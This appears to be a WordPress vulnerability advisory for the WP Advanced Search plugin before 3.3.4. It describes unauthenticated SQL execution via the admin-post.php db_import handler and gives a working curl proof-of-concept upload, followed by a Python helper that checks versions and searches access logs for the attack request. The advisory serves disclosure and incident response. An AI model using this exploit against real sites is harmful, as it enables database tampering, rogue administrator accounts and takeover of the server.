WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)



Description
The WP Advanced Search plugin lets an unauthenticated visitor run arbitrary SQL statements against the WordPress database: its database-import handler, reachable through wp-admin/admin-post.php?action=db_import, executes the contents of an uploaded .sql file without requiring a logged-in user (admin-post.php also dispatches requests from anonymous visitors, so a URL under wp-admin does not by itself imply authentication). Arbitrary database writes are enough for a full compromise: an attacker can, for example, insert a new administrator account, log in with it, upload a malicious plugin and thereby obtain Remote Code Execution (RCE).
Proof of Concept
# PoC: update the admin's display name (user id 1) through the plugin's
# db_import handler. No session cookie or nonce is sent; the target is
# assumed to run at 127.0.0.1:8000. The uploaded file is the SQL to execute.
printf 'update wp_users set display_name="Frycos" where id = 1;\n' > test.sql

curl -i -s -k -X POST \
    -F 'wp_advanced_search_file_import=@test.sql;type=application/sql' \
    'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'
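The following triage helper is an added example, not part of the original advisory or of the plugin's code. It does two things a responder needs after reading the PoC above: it decides whether an installed plugin version is below the fixed 3.3.4, and it scans web-server access log lines (combined log format; the sample lines are constructed, the IPs are documentation ranges) for the request shape the PoC uses, a POST to wp-admin/admin-post.php with action=db_import. The log format, field names and sample requests are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# First version that is not affected, per the advisory.
FIXED_VERSION = (3, 3, 4)

# Apache/nginx "combined" log format (assumed); captures only what we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Mar/2020:10:14:02 +0000] "POST /wp-admin/admin-post.php?action=db_import HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '198.51.100.3 - - [05/Mar/2020:10:14:05 +0000] "GET /wp-admin/admin-post.php?action=db_import HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [05/Mar/2020:10:15:11 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 55 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Mar/2020:10:16:40 +0000] "POST /blog/wp-admin/admin-post.php?action=db_import&x=1 HTTP/1.1" 500 0 "-" "python-requests/2.23"',
]


def parse_version(v):
    """'3.3.10' -> (3, 3, 10); tuple comparison orders numerically, not as strings,
    so 3.3.10 correctly sorts after 3.3.4."""
    return tuple(int(p) for p in v.strip().split("."))


def is_vulnerable_version(v):
    """True when the installed plugin version is older than the fixed release."""
    return parse_version(v) < FIXED_VERSION


def is_db_import_hit(line):
    """True for a POST to .../wp-admin/admin-post.php with action=db_import.

    GET requests are ignored: PHP only populates $_FILES for POST bodies, and
    the import handler takes its SQL from an uploaded file.
    """
    m = LOG_RE.match(line)
    if not m or m.group("method") != "POST":
        return False
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return False
    # parse_qs handles extra parameters and repeated keys; match on the value.
    return "db_import" in parse_qs(url.query).get("action", [])


def find_db_import_hits(lines):
    """Return (client_ip, timestamp, status) for every matching request."""
    hits = []
    for line in lines:
        if is_db_import_hit(line):
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for version in ("3.3.3", "3.3.4", "3.3.10"):
        print(version, "vulnerable" if is_vulnerable_version(version) else "fixed")
    for ip, ts, status in find_db_import_hits(SAMPLE_LOG):
        print(f"db_import POST from {ip} at {ts} -> HTTP {status}")
```

Access logs only show that the endpoint was called, not which SQL was uploaded, so a hit is a lead rather than proof of compromise: follow it up by checking wp_users and wp_usermeta for unexpected administrator accounts and the plugins directory for files newer than the hit's timestamp. A 302 is the normal outcome of admin-post.php and does not mean the import failed.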

Affects Plugin

WP Advanced Search, all versions before 3.3.4; fixed in version 3.3.4

References

URL https://wordpress.org/plugins/wp-advanced-search/#developers

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Florian Hauser
Submitter Twitter @frycos
Views 1718
Verified No
WPVDB ID 10115

Timeline

Publicly Published 2020-03-05
Added 2020-03-05
Last Updated 2020-03-06
